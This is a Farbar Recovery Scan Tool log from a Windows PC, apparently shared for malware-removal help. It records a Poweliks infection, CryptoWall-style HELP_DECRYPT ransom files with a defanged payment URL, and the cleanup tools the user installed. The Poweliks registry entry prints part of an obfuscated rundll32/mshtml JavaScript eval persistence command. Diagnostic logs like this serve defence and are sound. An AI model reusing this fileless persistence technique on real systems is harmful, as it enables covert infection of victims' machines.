HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
Startup: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.HTML ()
Startup: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.PNG ()
Startup: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.TXT ()
InternetURL: C:\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.URL -> hxxp://paytoc4gtpn5czl2.torconnectpaycom/1msme5i
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll (AVAST Software)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/HPDSK13/1
HKU\S-1-5-21-1427692388-1042374531-2795145444-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
SearchScopes: HKLM-x32 -> {8E0E081D-FD81-46C2-AD92-3B939C17F151} URL = http://www.amazon.co...s={searchTerms}
SearchScopes: HKLM-x32 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo....psg&type=HPDTDF
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: No Name -> {7F96F190-09C4-4BEC-B7FB-A9E26151EAB0}} ->  No File
BHO: No Name -> {AA58ED58-01DD-4d91-8333-CF10577473F7} ->  No File
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Internet Security\Engine\20.6.0.27\coIEPlg.dll (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton Internet Security\Engine\20.6.0.27\IPS\IPSBHO.DLL (Symantec Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\ssv.dll (Oracle Corporation)
BHO-x32: No Name -> {7F96F190-09C4-4BEC-B7FB-A9E26151EAB0}} ->  No File
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)
Toolbar: HKLM - No Name - {2318C2B1-4965-11d4-9B18-009027A5CD4F} -  No File
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine\20.6.0.27\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKU\.DEFAULT -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{0C5C3F02-879E-42E8-8113-9C0FA649DB90}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{462105B1-AF78-47E3-AC0D-109F28027A93}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{9B004C7D-7A34-4A9C-BEDB-5212A582FAB1}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{D24FA36B-6CD5-4603-8F72-73AC28D99F5B}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
 
FireFox:
========
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @java.com/DTPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.26.9\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.26.9\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll ()
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\IPSFF
FF Extension: Norton Vulnerability Protection - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\IPSFF [2014-07-23]
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\coFFPlgn
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\coFFPlgn [2015-02-20]
 
Chrome: 
=======
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Profile: C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-02-19]
CHR Extension: (Google Docs) - C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-19]
CHR Extension: (Google Drive) - C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-02-19]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2015-02-19]
CHR Extension: (YouTube) - C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-02-19]
CHR Extension: (Google Search) - C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-02-19]
CHR Extension: (Google Sheets) - C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-02-19]
CHR Extension: (Norton Identity Safe) - C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\iikflkcanblccfahdhdonehdalibjnif [2015-02-19]
CHR Extension: (Google Wallet) - C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-02-19]
CHR Extension: (Gmail) - C:\Users\Dorothy01\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-02-19]
CHR HKLM\...\Chrome\Extension: [bejnhdlplbjhffionohbdnpcbobfejcc] - C:\Program Files (x86)\Norton Internet Security\Engine\20.6.0.27\Exts\Chrome.crx [2014-12-09]
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - https://clients2.goo...ice/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [bejnhdlplbjhffionohbdnpcbobfejcc] - C:\Program Files (x86)\Norton Internet Security\Engine\20.6.0.27\Exts\Chrome.crx [2014-12-09]
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - https://clients2.goo...ice/update2/crx
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [344064 2014-07-04] (Advanced Micro Devices, Inc.) [File not signed]
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [50344 2015-02-19] (AVAST Software)
R2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [85504 2012-08-15] (Hewlett-Packard Company) [File not signed]
R2 HPConnectedRemote; c:\Program Files (x86)\Hewlett-Packard\HP Connected Remote\HPConnectedRemoteService.exe [35232 2012-07-19] (Hewlett-Packard)
R2 IconMan_R; C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe [2451456 2012-07-13] (Realsil Microelectronics Inc.) [File not signed]
R2 NIS; C:\Program Files (x86)\Norton Internet Security\Engine\20.6.0.27\ccSvcHst.exe [144368 2013-05-20] (Symantec Corporation)
S3 w3logsvc; C:\Windows\system32\inetsrv\w3logsvc.dll [76800 2014-10-14] (Microsoft Corporation)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347880 2014-09-24] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2014-09-24] (Microsoft Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [29208 2015-02-19] ()
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [83280 2015-02-19] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65776 2015-02-19] ()
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1050432 2015-02-19] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [436624 2015-02-19] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [267632 2015-02-19] ()
R3 BHDrvx64; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\Definitions\BASHDefs\20140912.003\BHDrvx64.sys [1586904 2014-09-12] (Symantec Corporation)
S3 BS1924802738; C:\Users\Dorothy01\AppData\Local\Temp\NTFS.sys [13192 2015-02-21] (Sysinternals) [File not signed]
R3 ccSet_NIS; C:\Windows\system32\drivers\NISx64\1406000.01B\ccSetx64.sys [169048 2013-04-15] (Symantec Corporation)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [92536 2012-06-25] (CyberLink)
R3 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [487216 2014-09-09] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [142640 2014-09-09] (Symantec Corporation)
R3 IDSVia64; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\Definitions\IPSDefs\20140919.001\IDSvia64.sys [633560 2014-08-29] (Symantec Corporation)
S3 massfilter_hs; C:\WINDOWS\system32\drivers\massfilter_hs.sys [20232 2012-06-20] (HandSet Incorporated)
S3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [129752 2015-02-19] (Malwarebytes Corporation)
S3 NAVENG; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\Definitions\VirusDefs\20140920.001\ENG64.SYS [129752 2014-09-01] (Symantec Corporation)
S3 NAVEX15; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\Definitions\VirusDefs\20140920.001\EX64.SYS [2137304 2014-09-01] (Symantec Corporation)
S3 SRTSP; C:\Windows\System32\Drivers\NISx64\1406000.01B\SRTSP64.SYS [796760 2013-05-15] (Symantec Corporation)
R3 SRTSPX; C:\Windows\system32\drivers\NISx64\1406000.01B\SRTSPX64.SYS [36952 2013-03-04] (Symantec Corporation)
R3 SymDS; C:\Windows\system32\drivers\NISx64\1406000.01B\SYMDS64.SYS [493656 2013-05-20] (Symantec Corporation)
R3 SymEFA; C:\Windows\system32\drivers\NISx64\1406000.01B\SYMEFA64.SYS [1139800 2013-05-22] (Symantec Corporation)
S4 SymELAM; C:\Windows\system32\drivers\NISx64\1406000.01B\SymELAM.sys [23448 2012-06-20] (Symantec Corporation)
R3 SymEvent; C:\windows\system32\Drivers\SYMEVENT64x86.SYS [177312 2014-07-23] (Symantec Corporation)
R3 SymIRON; C:\Windows\system32\drivers\NISx64\1406000.01B\Ironx64.SYS [224416 2013-03-04] (Symantec Corporation)
R3 SymNetS; C:\Windows\System32\Drivers\NISx64\1406000.01B\SYMNETS.SYS [433752 2013-04-24] (Symantec Corporation)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [37624 2015-02-20] ()
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [123224 2014-09-24] (Microsoft Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2015-02-21 22:39 - 2015-02-21 22:40 - 00018356 _____ () C:\Users\Dorothy01\Desktop\FRST.txt
2015-02-21 22:39 - 2015-02-21 22:40 - 00000000 ____D () C:\FRST
2015-02-21 22:38 - 2015-02-21 22:38 - 00000383 _____ () C:\Users\Dorothy01\Desktop\idtool.txt
2015-02-21 22:24 - 2015-02-21 22:24 - 00008630 _____ () C:\Users\Dorothy01\HELP_DECRYPT.HTML
2015-02-21 22:24 - 2015-02-21 22:24 - 00008630 _____ () C:\Users\Dorothy01\Downloads\HELP_DECRYPT.HTML
2015-02-21 22:24 - 2015-02-21 22:24 - 00008630 _____ () C:\Users\Dorothy01\Desktop\HELP_DECRYPT.HTML
2015-02-21 22:24 - 2015-02-21 22:24 - 00004258 _____ () C:\Users\Dorothy01\HELP_DECRYPT.TXT
2015-02-21 22:24 - 2015-02-21 22:24 - 00004258 _____ () C:\Users\Dorothy01\Downloads\HELP_DECRYPT.TXT
2015-02-21 22:24 - 2015-02-21 22:24 - 00004258 _____ () C:\Users\Dorothy01\Desktop\HELP_DECRYPT.TXT
2015-02-21 22:24 - 2015-02-21 22:24 - 00000292 _____ () C:\Users\Dorothy01\HELP_DECRYPT.URL
2015-02-21 22:24 - 2015-02-21 22:24 - 00000292 _____ () C:\Users\Dorothy01\Downloads\HELP_DECRYPT.URL
2015-02-21 22:24 - 2015-02-21 22:24 - 00000292 _____ () C:\Users\Dorothy01\Desktop\HELP_DECRYPT.URL
2015-02-21 22:15 - 2015-02-21 22:15 - 02086912 _____ (Farbar) C:\Users\Dorothy01\Desktop\FRST64.exe
2015-02-21 22:12 - 2015-02-21 22:12 - 02745248 _____ () C:\Users\Dorothy01\Downloads\idtool.zip
2015-02-21 19:12 - 2015-02-21 19:12 - 00101120 _____ () C:\Users\Dorothy01\Downloads\Extras.Txt
2015-02-21 19:07 - 2015-02-21 19:14 - 00137792 _____ () C:\Users\Dorothy01\Downloads\OTL.Txt
2015-02-21 18:42 - 2015-02-21 18:42 - 00602112 _____ (OldTimer Tools) C:\Users\Dorothy01\Downloads\OTL.exe
2015-02-21 18:33 - 2015-02-21 18:33 - 00001616 _____ () C:\WINDOWS\PFRO.log
2015-02-21 03:30 - 2015-02-21 03:30 - 00023552 _____ () C:\Users\Dorothy01\AppData\Local\pgkunge.dll
2015-02-20 19:35 - 2015-02-20 19:35 - 02347384 _____ (ESET) C:\Users\Dorothy01\Downloads\esetsmartinstaller_enu.exe
2015-02-20 19:35 - 2015-02-20 19:35 - 02347384 _____ (ESET) C:\Users\Dorothy01\Downloads\esetsmartinstaller_enu (1).exe
2015-02-20 19:33 - 2015-02-20 19:33 - 00190152 _____ (ESET) C:\Users\Dorothy01\Downloads\ESETPoweliksCleaner (2).exe
2015-02-20 19:33 - 2015-02-20 19:33 - 00190152 _____ (ESET) C:\Users\Dorothy01\Downloads\ESETPoweliksCleaner (1).exe
2015-02-20 19:33 - 2015-02-20 19:33 - 00002814 _____ () C:\Users\Dorothy01\Downloads\ESETPoweliksCleaner (1).exe_20150220.193324.1664.log
2015-02-20 06:45 - 2015-02-21 22:40 - 00000000 ____D () C:\Users\Dorothy01\AppData\Local\CrashDumps
2015-02-20 06:41 - 2015-02-20 18:46 - 00000922 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2015-02-20 06:41 - 2015-02-20 06:41 - 00003894 _____ () C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2015-02-20 06:41 - 2015-02-20 06:41 - 00003658 _____ () C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2015-02-20 06:07 - 2015-02-20 19:18 - 00037624 _____ () C:\WINDOWS\system32\Drivers\TrueSight.sys
2015-02-20 06:07 - 2015-02-20 06:07 - 00000000 ____D () C:\ProgramData\RogueKiller
2015-02-19 22:07 - 2015-02-19 22:09 - 18683992 _____ () C:\Users\Dorothy01\Downloads\RogueKillerX64.exe
2015-02-19 22:04 - 2015-02-19 22:04 - 00000000 ____D () C:\Users\Dorothy01\AppData\Roaming\AVAST Software
2015-02-19 21:41 - 2015-02-19 21:41 - 00002814 _____ () C:\Users\Dorothy01\Downloads\ESETPoweliksCleaner.exe_20150219.214114.592.log
2015-02-19 21:33 - 2015-02-21 03:14 - 00000000 ____D () C:\AdwCleaner
2015-02-19 21:33 - 2015-02-19 21:33 - 00002814 _____ () C:\Users\Dorothy01\Downloads\ESETPoweliksCleaner.exe_20150219.213330.1188.log
2015-02-19 21:33 - 2015-02-19 21:33 - 00002814 _____ () C:\Users\Dorothy01\Downloads\ESETPoweliksCleaner.exe_20150219.213304.1212.log
2015-02-19 21:32 - 2015-02-19 21:33 - 02126848 _____ () C:\Users\Dorothy01\Downloads\adwcleaner_4.111.exe
2015-02-19 21:32 - 2015-02-19 21:32 - 00190152 _____ (ESET) C:\Users\Dorothy01\Downloads\ESETPoweliksCleaner.exe
2015-02-19 21:32 - 2015-02-19 21:32 - 00002814 _____ () C:\Users\Dorothy01\Downloads\ESETPoweliksCleaner.exe_20150219.213253.1128.log
2015-02-19 21:27 - 2015-02-19 21:27 - 00001982 _____ () C:\Users\Public\Desktop\Avast Free Antivirus.lnk
2015-02-19 21:27 - 2015-02-19 21:27 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVAST Software
2015-02-19 21:27 - 2015-02-19 21:17 - 00364512 _____ (AVAST Software) C:\WINDOWS\system32\aswBoot.exe
2015-02-19 21:23 - 2015-02-19 21:23 - 05006864 _____ (AVAST Software) C:\Users\Dorothy01\Downloads\avast_free_antivirus_setup_online.exe
2015-02-19 21:20 - 2015-02-19 21:27 - 00000350 ____H () C:\WINDOWS\Tasks\avast! Emergency Update.job
2015-02-19 21:20 - 2015-02-19 21:20 - 00002281 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2015-02-19 21:20 - 2015-02-19 21:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
2015-02-19 21:20 - 2015-02-19 21:20 - 00000000 ____D () C:\ProgramData\Google
2015-02-19 21:20 - 2015-02-19 21:20 - 00000000 ____D () C:\Program Files\Google
2015-02-19 21:18 - 2015-02-21 22:34 - 00000918 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2015-02-19 21:18 - 2015-02-19 21:21 - 00000000 ____D () C:\Users\Dorothy01\AppData\Local\Google
2015-02-19 21:18 - 2015-02-19 21:20 - 00000000 ____D () C:\Program Files (x86)\Google
2015-02-19 21:17 - 2015-02-19 21:27 - 01050432 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswsnx.sys
2015-02-19 21:17 - 2015-02-19 21:27 - 00083280 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswmonflt.sys
2015-02-19 21:17 - 2015-02-19 21:17 - 00436624 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswSP.sys
2015-02-19 21:17 - 2015-02-19 21:17 - 00267632 _____ () C:\WINDOWS\system32\Drivers\aswVmm.sys
2015-02-19 21:17 - 2015-02-19 21:17 - 00065776 _____ () C:\WINDOWS\system32\Drivers\aswRvrt.sys
2015-02-19 21:17 - 2015-02-19 21:17 - 00043152 _____ (AVAST Software) C:\WINDOWS\avastSS.scr
2015-02-19 21:17 - 2015-02-19 21:17 - 00029208 _____ () C:\WINDOWS\system32\Drivers\aswHwid.sys
2015-02-19 21:15 - 2015-02-19 21:15 - 00000000 ____D () C:\ProgramData\AVAST Software
2015-02-19 21:15 - 2015-02-19 21:15 - 00000000 ____D () C:\Program Files\AVAST Software
2015-02-19 21:13 - 2015-02-19 21:14 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2015-02-19 21:10 - 2015-02-21 03:14 - 00000292 _____ () C:\HELP_DECRYPT.URL
2015-02-19 21:07 - 2015-02-19 21:07 - 00023552 _____ () C:\Users\Dorothy01\AppData\Local\pckunie.dll
2015-02-19 18:15 - 2015-02-19 18:15 - 00003180 _____ () C:\WINDOWS\SysWOW64\InstallUtil.InstallLog
2015-02-18 16:53 - 2015-02-19 21:49 - 00129752 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2015-02-18 16:52 - 2015-02-18 16:52 - 00001120 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-02-18 16:52 - 2015-02-18 16:52 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-02-18 16:52 - 2015-02-18 16:52 - 00000000 ____D () C:\ProgramData\Malwarebytes
2015-02-18 16:52 - 2015-02-18 16:52 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-02-18 16:52 - 2014-11-21 06:14 - 00093400 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2015-02-18 16:52 - 2014-11-21 06:14 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2015-02-18 16:52 - 2014-11-21 06:14 - 00025816 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbam.sys
2015-02-18 16:48 - 2015-02-18 16:48 - 00000836 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2015-02-18 16:48 - 2015-02-18 16:48 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2015-02-18 16:48 - 2015-02-18 16:48 - 00000000 ____D () C:\Program Files\CCleaner
2015-02-18 16:39 - 2015-02-21 22:17 - 00000000 ____D () C:\WINDOWS\pss
2015-02-11 17:53 - 2015-02-11 17:53 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ZTE Handset USB Driver
2015-02-11 17:53 - 2015-02-11 17:53 - 00000000 ____D () C:\Program Files\ZTE_Handset_USB_Driver
2015-02-11 17:53 - 2013-09-11 16:27 - 00134976 _____ (ZTE Corporation) C:\WINDOWS\system32\Drivers\zghsser.sys
2015-02-11 17:53 - 2013-09-11 16:26 - 00175808 _____ (ZTE Corporation) C:\WINDOWS\system32\Drivers\zghsnet.sys
2015-02-11 17:53 - 2013-03-19 18:38 - 00821544 _____ () C:\WINDOWS\adb.exe
2015-02-11 17:53 - 2012-11-09 17:14 - 00062728 _____ (VIA Telecom) C:\WINDOWS\system32\Drivers\viahsser.sys
2015-02-11 17:53 - 2012-10-31 18:02 - 00032136 _____ (Via Telecom, Inc.) C:\WINDOWS\system32\Drivers\viahsets.sys
2015-02-11 17:53 - 2012-06-20 13:51 - 00020232 _____ (HandSet Incorporated) C:\WINDOWS\system32\Drivers\massfilter_hs.sys
2015-02-11 17:53 - 2012-06-08 16:56 - 01721576 _____ () C:\WINDOWS\system32\WdfCoInstaller01009.dll
2015-02-11 17:53 - 2012-06-08 16:56 - 01002728 _____ () C:\WINDOWS\system32\WinUSBCoInstaller2.dll
2015-02-11 17:53 - 2011-10-26 17:31 - 00067608 _____ (Google, inc) C:\WINDOWS\AdbWinUsbApi.dll
2015-02-11 17:53 - 2011-08-15 18:43 - 00102936 _____ (Google, inc) C:\WINDOWS\AdbWinApi.dll
2015-02-09 16:56 - 2015-02-09 16:56 - 00000000 ____H () C:\WINDOWS\system32\Drivers\Msft_User_WpdMtpDr_01_11_00.Wdf
2015-01-24 16:45 - 2015-02-19 07:41 - 00000000 ____D () C:\Users\Dorothy01\AppData\Local\{294523ef-b8b6-59cc-fe37-7cd365b2a599}
2015-01-22 10:52 - 2015-01-22 10:52 - 00003296 ____N () C:\bootsqm.dat
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2015-02-21 22:38 - 2014-07-23 09:19 - 00003598 _____ () C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1427692388-1042374531-2795145444-1001
2015-02-21 22:37 - 2014-09-24 01:15 - 00006428 _____ () C:\WINDOWS\system32\PerfStringBackup.INI
2015-02-21 22:33 - 2014-12-09 19:03 - 00000000 ___HD () C:\ProgramData\{F66CB4EE-546F-4D54-9332-216DE189AAB0}
2015-02-21 22:33 - 2014-10-14 09:44 - 00000000 ____D () C:\Users\Dorothy01
2015-02-21 22:31 - 2012-08-31 22:56 - 00000000 ____D () C:\ProgramData\Hewlett-Packard
2015-02-21 22:30 - 2013-08-22 09:36 - 00000000 ____D () C:\WINDOWS\system32\sru
2015-02-21 22:28 - 2013-08-22 08:45 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT
2015-02-21 22:13 - 2014-10-23 11:14 - 04012982 _____ (NathanScott Apps) C:\Users\Dorothy01\Desktop\IDTool.exe
2015-02-21 19:37 - 2013-08-22 07:25 - 01048576 ___SH () C:\WINDOWS\system32\config\BBI
2015-02-21 03:31 - 2014-11-11 19:11 - 00000761 _____ () C:\WINDOWS\system32\Drivers\etc\hosts.txt
2015-02-21 03:14 - 2014-07-23 16:07 - 00000000 ____D () C:\StarmIRC v3.0
2015-02-21 03:14 - 2014-07-23 16:05 - 00000000 ____D () C:\StarPircH
2015-02-21 03:14 - 2012-08-01 21:15 - 00000000 ____D () C:\SWSETUP
2015-02-21 03:14 - 2012-08-01 03:57 - 00000000 _RSHD () C:\SYSTEM.SAV
2015-02-20 06:09 - 2014-07-23 16:00 - 00000000 ____D () C:\ProgramData\Oracle
2015-02-20 06:09 - 2014-07-23 15:56 - 00000000 ____D () C:\Program Files (x86)\Java
2015-02-20 06:07 - 2014-07-23 15:56 - 00272296 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\javaws.exe
2015-02-20 06:07 - 2014-07-23 15:56 - 00176552 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\javaw.exe
2015-02-20 06:07 - 2014-07-23 15:56 - 00176552 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\java.exe
